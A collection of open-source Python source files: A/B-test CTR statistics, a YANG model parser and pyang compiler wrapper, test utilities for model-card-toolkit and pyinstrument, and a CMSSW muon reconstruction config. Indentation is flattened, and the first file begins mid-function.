s2 = clicks_0 * (1 - rb) ** 2 + (views_0 - clicks_0) * rb ** 2
s2 = np.sum(s2, axis=1) / (np.sum(views_0, axis=1) - 1)
rho = np.maximum(0, 1 - s3 / s2).reshape(-1, 1)
w_0 = views_0 / (1 + (views_0 - 1) * rho)
w_1 = views_1 / (1 + (views_1 - 1) * rho)
return w_0, w_1
def linearization_of_clicks(clicks_0, views_0, clicks_1, views_1):
"""
Fits linear model clicks = k * views and returns clicks - k * views (e.g. it accounts for correlation of
clicks and views)
:param clicks_0: np.array shape (n_experiments, n_users), clicks of every user from control group in every experiment
:param views_0: np.array shape (n_experiments, n_users), views of every user from control group in every experiment
:param clicks_1: np.array shape (n_experiments, n_users), clicks of every user from treatment group in every experiment
:param views_1: np.array shape (n_experiments, n_users), views of every user from treatment group in every experiment
    :return: (np.array, np.array) shape (n_experiments, n_users), linearized clicks for every user in every experiment
"""
k = clicks_0.flatten().sum() / views_0.flatten().sum()
L_0 = clicks_0 - k * views_0
L_1 = clicks_1 - k * views_1
return L_0, L_1
def permutation_test(clicks_0: np.ndarray,
views_0: np.ndarray,
clicks_1: np.ndarray,
views_1: np.ndarray,
samples: int = 2000) -> np.ndarray:
n_experiments = views_0.shape[0]
n_users_0 = views_0.shape[1]
n_users_1 = views_1.shape[1]
permutations = np.zeros((samples, n_users_0 + n_users_1)).astype(np.int32)
permutation = np.arange(n_users_0 + n_users_1)
for i in range(samples):
np.random.shuffle(permutation)
permutations[i] = permutation.copy()
permutation_flags = (permutations < n_users_0).astype(np.int32)
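    # Each row of flags marks which users fall into the pseudo-control group; matrix
    # products with clicks and views then yield the null distribution of the CTR delta.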
concated_views = np.hstack((views_0, views_1))
concated_clicks = np.hstack((clicks_0, clicks_1))
clicks_sum_0 = np.matmul(concated_clicks, permutation_flags.T)
clicks_sum_1 = np.matmul(concated_clicks, 1 - permutation_flags.T)
views_sum_0 = np.matmul(concated_views, permutation_flags.T)
views_sum_1 = np.matmul(concated_views, 1 - permutation_flags.T)
null_stats = clicks_sum_1 / views_sum_1 - clicks_sum_0 / views_sum_0
null_stats = np.sort(null_stats)
p_values = np.zeros(n_experiments)
for i in range(n_experiments):
exp_stat = clicks_1[i].sum() / views_1[i].sum() - clicks_0[i].sum() / views_0[i].sum()
insert_position = np.searchsorted(null_stats[i], exp_stat)
p_values[i] = 2 * np.minimum(samples - insert_position, insert_position) / samples
return p_values
|
server/explorer/utils/yang.py | s-bauer/yang-explorer | 437 | 12687816 | """
Copyright 2015, Cisco Systems, Inc
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
@author: <NAME>, Cisco Systems, Inc.
"""
import os
import re
import glob
import logging
import subprocess
from sets import Set
import lxml.etree as ET
from django.conf import settings
from explorer.utils.dygraph import DYGraph
from explorer.utils.misc import ServerSettings
class Parser(object):
"""
Basic Yang modulename parser
"""
def __init__(self, filename):
self.module = None
self.revision = None
self.imports = []
self.includes = []
if not os.path.exists(filename):
return
module_re = re.compile("""^\s*[sub]*module\s+['"]?\s*([\w+[\-\w+]+)\s*['"]?\s*""")
revision_re = re.compile("""^\s*revision\s+['"]?\s*(\w+-\w+-\w+)\s*['"]?\s*""")
import_re = re.compile("""^\s*import\s+['"]?\s*([\w+[\-\w+]+)\s*['"]?\s*""")
include_re = re.compile("""^\s*include\s+['"]?\s*([\w+[\-\w+]+)\s*['"]?\s*""")
with open(filename, 'r') as f:
for line in f:
if self.module is None:
res = module_re.match(line)
if res is not None:
self.module = res.group(1).strip()
continue
imp = import_re.match(line)
if imp is not None:
self.imports.append(imp.group(1).strip())
continue
inc = include_re.match(line)
if inc is not None:
self.includes.append(inc.group(1).strip())
continue
res = revision_re.match(line)
if res is not None:
self.revision = res.group(1).strip()
break
if self.module is None:
logging.error('Could not parse modulename, uploaded file may be corrupted !!')
def get_filename(self):
"""
Returns: yang file name with version suffix.
"""
if self.revision:
return self.module + '@' + self.revision + '.yang'
return self.module + '.yang'
def get_dependency(self):
"""
Returns: List of dependency (yang imports and includes)
"""
return self.imports + self.includes
def __str__(self):
return self.get_filename() + ' -> ' + str(self.get_dependency())
class Compiler(object):
"""
Compile yang models into cxml
"""
@staticmethod
def compile_cxml(username, session, filename):
"""
Compile yang model and return tuple (boolean, list-of-errors)
"""
logging.debug('Compiling %s .. !!' % filename)
plugins = os.path.join(settings.BASE_DIR, 'explorer', 'plugins')
if not os.path.exists(plugins):
logging.error('CXML Plugin directory is missing .. !!')
return False, None
if subprocess.call(['which', 'pyang']) != 0:
logging.error('Could not find pyang compiler, please install pyang .. !!')
return False, None
basename = os.path.basename(filename)
modulename = basename.split('.')[0].strip()
session_dir = ''
if session is not None:
session_dir = ServerSettings.session_path(session)
if not os.path.exists(session_dir):
logging.error('compile_cxml: Session directory %s not found !!', session_dir)
return False, ["Session error !!"]
yangfile = os.path.join(session_dir, modulename + '.yang')
cxmlfile = os.path.join(session_dir, modulename + '.xml')
else:
yangfile = os.path.join(ServerSettings.yang_path(username), modulename + '.yang')
cxmlfile = os.path.join(ServerSettings.cxml_path(username), modulename + '.xml')
# Verify if yang file exists
if not os.path.exists(yangfile):
logging.debug("compile_cxml: " + yangfile + ' not found !!')
return False, ["Yang module %s not found on server !!" % modulename]
command = ['pyang', '-f', 'cxml', '--plugindir', 'explorer/plugins', '-p']
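        # Build the pyang command using the custom 'cxml' output plugin from explorer/plugins.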
# include path for pyang compilation
includes = ServerSettings.yang_path(username)
if session_dir:
includes += ':' + session_dir
command.append(includes)
# include dependent models
command += Compiler.get_dependencies(username, [filename], session)
# finally add target module
command.append(yangfile)
# create a callback to handle empty output
def empty_callback(outfile):
module = os.path.basename(outfile)
module = module.split('.')[0]
module = module.split('@')[0]
node = ET.Element('node')
node.set('name', module)
node.set('type', 'module')
with open(outfile, 'w') as fd:
fd.write(ET.tostring(node))
logging.debug('compile_cxml: Empty output from pyang, created default cxml!!')
return Compiler.invoke_compile(command, cxmlfile, empty_callback)
@staticmethod
def compile_pyimport(username, session=None):
"""
Compile yang model and return tuple (boolean, list-of-errors)
"""
plugins = os.path.join(settings.BASE_DIR, 'explorer', 'plugins')
if not os.path.exists(plugins):
logging.error('CXML Plugin directory is missing .. !!')
return False, None
if subprocess.call(['which', 'pyang']) != 0:
logging.error('Could not find pyang compiler, please install pyang .. !!')
return False, None
logging.debug('Rebuilding dependencies for user %s' % username)
# build include path
includes = [ServerSettings.yang_path(username)]
if session is not None:
session_dir = ServerSettings.session_path(session)
if not os.path.exists(session_dir):
logging.error('compile_pyimport: Session directory %s not found !!', session_dir)
return False, ["Session error !!"]
includes.append(session_dir)
depfile = os.path.join(session_dir, 'dependencies.xml')
else:
depfile = os.path.join(includes[0], 'dependencies.xml')
target_yangs = []
for yang_dir in includes:
for _file in glob.glob(os.path.join(yang_dir, '*.yang')):
target_yangs.append(_file)
if not target_yangs:
logging.debug('compile_pyimport: No yang file found !!')
return True, ET.Element('messages')
command = ['pyang', '-f', 'pyimport', '--plugindir', 'explorer/plugins', '-p']
command += [':'.join(includes)]
command += target_yangs
return Compiler.invoke_compile(command, depfile)
@staticmethod
def get_dependencies(username, modules, session):
"""
return dependencies for given yang models
"""
session_dir = ''
logging.debug("get_dependencies: Target Modules " + str(modules))
if session is not None:
session_dir = ServerSettings.session_path(session)
dfile = os.path.join(session_dir, 'dependencies.xml')
else:
dfile = os.path.join(ServerSettings.yang_path(username), 'dependencies.xml')
if not os.path.exists(dfile):
logging.error('get_dependencies: dependency file %s missing!!', dfile)
return []
if session_dir:
session_files = [os.path.basename(_file) for _file in glob.glob(os.path.join(session_dir, '*.yang'))]
yang_path = ServerSettings.yang_path(username)
yang_files = [os.path.basename(_file) for _file in glob.glob(os.path.join(yang_path, '*.yang'))]
dmodules = Set([])
dgraph = DYGraph(dfile)
for m in modules:
module = dgraph.dependency_module(m)
if module is None:
continue
for name in module.imports:
dmodules.add(name)
for name in module.includes:
dmodules.add(name)
for name in module.depends:
dmodules.add(name)
dmodules_list = list(dmodules)
deplist = []
for _file in dmodules_list:
# prefer freshly uploaded files
if session_dir:
depfile = _find_matching(_file, session_dir, session_files)
else:
depfile = _find_matching(_file, yang_path, yang_files)
if depfile is not None:
deplist.append(depfile)
else:
logging.warning("get_dependencies: Dependency (%s) not satisfied, compilation may fail !!" % _file)
logging.debug("get_dependencies: Computed " + str(deplist))
return deplist
@staticmethod
def invoke_compile(command, outfile, empty_callback=None):
"""
Invoke pyang compilation and return result
"""
logging.debug("invoke_compile: CMD: " + str(command))
p = subprocess.Popen(command,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
rc = True
lines = []
if stderr:
lines = stderr.split('\n')
if p.returncode != 0:
logging.error('invoke_compile: Compile Errors: ' + str(lines))
if os.path.exists(outfile):
os.remove(outfile)
rc = False
elif stdout:
with open(outfile, 'w') as fd:
fd.write(stdout)
logging.debug('invoke_compile: %s -> done', outfile)
logging.debug('invoke_compile: Compile Warning: ' + str(lines))
else:
logging.warning('invoke_compile: empty pyang output !!')
if empty_callback is not None:
empty_callback(outfile)
messages = ET.Element('messages')
for line in lines:
msg = ET.Element('message')
msg.text = line
messages.append(msg)
return rc, messages
def _find_matching(target, directory, modules):
logging.debug('Searching target %s in %s' % (target, directory))
if not modules:
modules = [os.path.basename(_file) for _file in glob.glob(os.path.join(directory, '*.yang'))]
for module in modules:
if module == target + '.yang':
return os.path.join(directory, module)
if module.startswith(target + '@'):
return os.path.join(directory, module)
return None
|
model_card_toolkit/utils/testdata/testdata_utils.py | BrickFrog/model-card-toolkit | 267 | 12687825 | # Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utilities for reading pipelines in testdata."""
import os
import shutil
import ml_metadata as mlmd
from ml_metadata.proto import metadata_store_pb2
# constants in a mlmd metadata store instance derived from a tfx pipeline
_TEST_DATA_DIR = os.path.join(os.path.dirname(__file__), 'tfx_oss_0_21')
_TFX_0_21_DB_FILE = 'metadata.sqlite'
_TFX_0_21_PAYLOAD_DIR = '/tmp/tfx-interactive-2020-03-24T21_31_20.888155-mny0kawj'
TFX_0_21_METRICS_ARTIFACT_IDS = (9, 11)
TFX_0_21_MODEL_ARTIFACT_ID = 8
TFX_0_21_MODEL_DATASET_ID = 2
TFX_0_21_MODEL_URI = os.path.join(_TEST_DATA_DIR, 'Trainer/model/6')
TFX_0_21_STATS_ARTIFACT_ID = 3
TFX_0_21_TRAINER_ID = 6
def get_tfx_pipeline_metadata_store(tmp_db_path: str) -> mlmd.MetadataStore:
"""Copies and opens a metadata_store from the testdata tfx pipeline db.
It migrates the db to the compatible schema at the head. In addition, it
updates the stored artifacts' uri to the test data db path, so that the test
code can open the testdata files mentioned in the database.
Args:
tmp_db_path: a temp path for copying the pipeline database.
Returns:
A ml-metadata store for the copied pipeline db.
"""
testdata_db_path = os.path.join(_TEST_DATA_DIR, _TFX_0_21_DB_FILE)
shutil.copyfile(testdata_db_path, tmp_db_path)
connection_config = metadata_store_pb2.ConnectionConfig(
sqlite=metadata_store_pb2.SqliteMetadataSourceConfig(
filename_uri=tmp_db_path,
connection_mode=metadata_store_pb2.SqliteMetadataSourceConfig
.READWRITE,
))
# The pipeline db is created with mlmd 0.21, the test run from the head
# may include newer mlmd schema versions. We migrate the db to newer
# mlmd schema if needed.
store = mlmd.MetadataStore(connection_config, enable_upgrade_migration=True)
# The pipeline db is generated with real pipelines in which the payloads of
# the artifacts are stored in the file system when the pipeline ran. We fix
# the uri to point to the testdata payloads generated by the pipeline.
fixed_artifacts = []
for artifact in store.get_artifacts():
artifact.uri = artifact.uri.replace(_TFX_0_21_PAYLOAD_DIR, _TEST_DATA_DIR)
fixed_artifacts.append(artifact)
store.put_artifacts(fixed_artifacts)
return store
|
test/test_ipython_magic.py | sandutsar/pyinstrument | 3,768 | 12687829 | from test.fake_time_util import fake_time
import pytest
# note: IPython should be imported within each test. Importing it in our tests
# seems to cause problems with subsequent tests.
cell_code = """
import time
def function_a():
function_b()
function_c()
def function_b():
function_d()
def function_c():
function_d()
def function_d():
function_e()
def function_e():
time.sleep(0.1)
function_a()
"""
# Tests #
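# cell_code (defined above) builds a small call tree; with fake_time each sleep(0.1) is
# deterministic, so the assertions expect 0.200s for function_a and 0.100s per sleep.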
@pytest.mark.ipythonmagic
def test_magics(ip):
from IPython.utils.io import capture_output as capture_ipython_output
with fake_time():
with capture_ipython_output() as captured:
ip.run_cell_magic("pyinstrument", line="", cell=cell_code)
assert len(captured.outputs) == 1
output = captured.outputs[0]
assert "text/html" in output.data
assert "text/plain" in output.data
assert "function_a" in output.data["text/html"]
assert "<iframe" in output.data["text/html"]
assert "function_a" in output.data["text/plain"]
assert "- 0.200 function_a" in output.data["text/plain"]
assert "- 0.100 sleep" in output.data["text/plain"]
with fake_time():
with capture_ipython_output() as captured:
# this works because function_a was defined in the previous cell
ip.run_line_magic("pyinstrument", line="function_a()")
assert len(captured.outputs) == 1
output = captured.outputs[0]
assert "function_a" in output.data["text/plain"]
assert "- 0.100 sleep" in output.data["text/plain"]
@pytest.mark.ipythonmagic
def test_magic_empty_line(ip):
# check empty line input
ip.run_line_magic("pyinstrument", line="")
# Utils #
@pytest.fixture(scope="module")
def session_ip():
from IPython.testing.globalipapp import start_ipython
yield start_ipython()
@pytest.fixture(scope="function")
def ip(session_ip):
session_ip.run_line_magic(magic_name="load_ext", line="pyinstrument")
yield session_ip
session_ip.run_line_magic(magic_name="reset", line="-f")
|
L1Trigger/DTTriggerPhase2/test/prod_Zmu_digis_segments_cfg.py | ckamtsikis/cmssw | 852 | 12687842 | import FWCore.ParameterSet.Config as cms
process = cms.Process("DigisSegments")
process.load("Geometry.CMSCommonData.cmsIdealGeometryXML_cff")
process.load("Geometry.DTGeometry.dtGeometry_cfi")
process.DTGeometryESModule.applyAlignment = False
process.load("Configuration.StandardSequences.FrontierConditions_GlobalTag_cff")
process.load("Configuration.StandardSequences.MagneticField_AutoFromDBCurrent_cff")
process.GlobalTag.globaltag = "90X_dataRun2_Express_v2"
process.load("RecoLocalMuon.Configuration.RecoLocalMuon_cff")
## DT unpacker
process.load("EventFilter.DTRawToDigi.dtunpacker_cfi")
process.muonDTDigis.inputLabel = 'rawDataCollector'
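## Input: Run2016B SingleMuon ZMu skim (RAW-RECO); raw data is re-unpacked into DT digis for local reconstruction.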
process.source = cms.Source("PoolSource",
fileNames = cms.untracked.vstring(
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/90000/A8CD55CA-1F94-E611-8017-0CC47A7C35A8.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/90000/5E3D3C6E-6594-E611-AB43-0CC47A4D7616.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/FEB68681-5A87-E611-9374-FA163EBB015F.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/F8A610D8-6287-E611-845E-FA163E57640C.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/F80380BB-7687-E611-84D6-02163E01653D.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/F4A6C6FD-B089-E611-9227-002590DE6E64.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/F40149E2-7387-E611-B057-0025904CF766.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/F21AA882-6C87-E611-8F39-FA163EA18210.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/F0A05CAE-5387-E611-BACB-FA163E9FDE85.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/F095A793-B389-E611-8A84-00259021A39E.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/EE733CB6-B189-E611-A2A6-B499BAAC054A.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/EA70D05E-4589-E611-BFE3-FA163E3F2846.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/E46AF903-6C87-E611-8658-FA163EDB91EF.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/E4332BCB-D687-E611-A9EA-0025905A6126.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/E09E85A0-EB86-E611-B17D-20CF3019DEEF.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/DEEA9DDD-E187-E611-B13B-FA163E73AE79.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/DA12BA92-B087-E611-B7A3-0242AC130002.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/D615D999-B189-E611-B46C-FA163E8E175A.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/D6055073-6E87-E611-8E91-FA163E8D8332.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/D4FD5F54-658B-E611-BED9-0CC47A4D7646.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/D029A3C8-4B89-E611-9D1F-FA163E631428.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/CE3E1EE9-9789-E611-998C-FA163ED21222.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/CCDC87DF-1A88-E611-9B2A-1CC1DE19274E.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/C8F8C3B2-5387-E611-B9FC-FA163E5669B0.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/C4B49819-F286-E611-B127-549F358EB76F.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/C2B91F86-5A87-E611-B7E7-02163E014C10.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/C09B5970-4B88-E611-9C48-901B0E5427A6.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/BE837F4E-9E87-E611-8DC8-3417EBE7047A.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/BAC10123-7787-E611-A0DE-02163E015FDF.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/B856E93F-E586-E611-BA74-FA163E1909D1.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/B64FD56E-6E87-E611-BD9C-02163E016438.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/B4BC5C81-6987-E611-B97A-F04DA275C2FB.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/B43870D6-1A88-E611-A7C0-0026B9F8CC18.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/AE723C49-B287-E611-ACE5-0CC47A78A42E.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/AC213957-658B-E611-A7AF-0025905B8612.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/AA51B3CF-4B89-E611-A41A-02163E013C40.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/A8FF1F89-E586-E611-BC37-FA163E08C002.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/A28F9FFD-B489-E611-B864-008CFAFBF132.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/A21B22EA-8888-E611-B0C4-0CC47A4DEEBA.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/A0C3ADD4-0E87-E611-892F-02163E014D8C.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/9EE91F3C-1B87-E611-878C-FA163E775232.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/9CAF60BB-4489-E611-A29C-FA163EEF018D.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/9AAB70FE-D587-E611-834C-FA163ECD5C62.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/9A522CDD-6287-E611-BA23-FA163E3DAA96.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/9A345235-E586-E611-9CE6-FA163EFA00C3.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/98CD93AB-3A88-E611-A4C8-B083FED04276.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/961767D1-B189-E611-A1A3-20CF305B05AE.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/90AAF1A6-5387-E611-B9B8-0025905C3DF6.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/90522755-9587-E611-A29C-C45444922BB0.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/901352B9-B189-E611-89EC-0CC47A6C183A.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/8E949801-8288-E611-B9D6-047D7BD6DF22.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/88ADAECF-5789-E611-81B2-FA163EDB91EF.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/8823F019-8587-E611-A162-00259073E3EA.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/80CD4397-2A88-E611-9639-20474791CCC4.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/8095FC8B-B389-E611-ADD9-7CD30AB7F868.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/767A38E6-6287-E611-B225-02163E015D84.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/744FC7C0-5387-E611-BA6F-FA163E06DFEA.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/6CFB58E7-1587-E611-BD35-FA163EC97E57.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/68DE47B4-7E88-E611-A6AE-001E67792422.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/68A0DCD5-BB87-E611-8BF3-008CFA0F5040.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/68171F81-6187-E611-A9DF-001E67504F1D.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/66421E3C-5489-E611-B0BE-001E67505A2D.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/64FB46E3-8887-E611-AAAA-FA163EFA220C.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/64CC5933-4088-E611-B8DD-0025904C641E.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/6448920B-7D87-E611-A5EA-02163E017614.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/6297FABA-5789-E611-A918-0CC47AC08BF8.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/5C7F15A9-9A88-E611-A80B-FA163EC5FCBC.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/5A63963D-B887-E611-88DC-001E6739C801.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/5404AF86-6187-E611-8DB3-44A84225CDA4.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/509458EF-B189-E611-9F85-FA163E17EB18.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/4C3B6518-B189-E611-93B3-0025905A612A.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/48E6AB0F-F286-E611-9792-FA163EDB91EF.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/40E2E2DE-8887-E611-9531-FA163E2AAF83.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/38FF87C2-B189-E611-B665-0CC47A1DF7FA.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/38CE04DC-5788-E611-9240-848F69FD2853.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/32775AB1-6C87-E611-A388-02163E0165D4.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/30A4019E-FE86-E611-B70E-02163E0165B6.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/2C6B53B6-5387-E611-9582-FA163E75F411.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/26D33DC4-3889-E611-B1AF-FA163E743F0B.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/26181B1F-6387-E611-AC9E-02163E01304E.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/24A815DC-0E87-E611-8D96-B083FED13C9E.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/22256107-6887-E611-847F-002590DE6E86.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/20263DED-9B88-E611-9630-001E67F336E0.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/1EF43C44-DE87-E611-BB70-6C3BE5B5B340.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/128426B7-8988-E611-BB9C-008CFA0A5A10.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/1041B010-6F87-E611-BA26-02163E015FDB.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/0E90E9AF-5387-E611-9FFA-FA163EC80D44.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/0C894F1B-5289-E611-8381-0025904C5DE0.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/0C6DFDD5-4D87-E611-9CF3-FA163E0B7F2E.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/0C153439-B187-E611-96D9-002590E1E9B8.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/083DFA38-B189-E611-BD7C-A0369F7FC770.root",
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/02A6971D-F286-E611-8364-002590DE6E32.root"
)
)
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(-1)
)
process.out = cms.OutputModule("PoolOutputModule",
outputCommands = cms.untracked.vstring('drop *','keep *_muonDTDigis_*_*','keep *_dt4DSegments_*_*'),
fileName = cms.untracked.string('/store/user/carrillo/digis_segments_Run2016BSingleMuonRAW-RECO.root')
)
process.p = cms.Path(process.muonDTDigis*process.dtlocalreco)
process.this_is_the_end = cms.EndPath(process.out)
|
robosuite/models/__init__.py | kyungjaelee/robosuite | 397 | 12687857 | import os
from .world import MujocoWorldBase
assets_root = os.path.join(os.path.dirname(__file__), "assets")
|
spaces/graph.py | JaniAnttonenp/ml-fairness | 268 | 12687869 | # coding=utf-8
# Copyright 2020 The ML Fairness Gym Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python2, python3
"""Graph spaces for the ML fairness gym."""
from __future__ import absolute_import
from __future__ import division
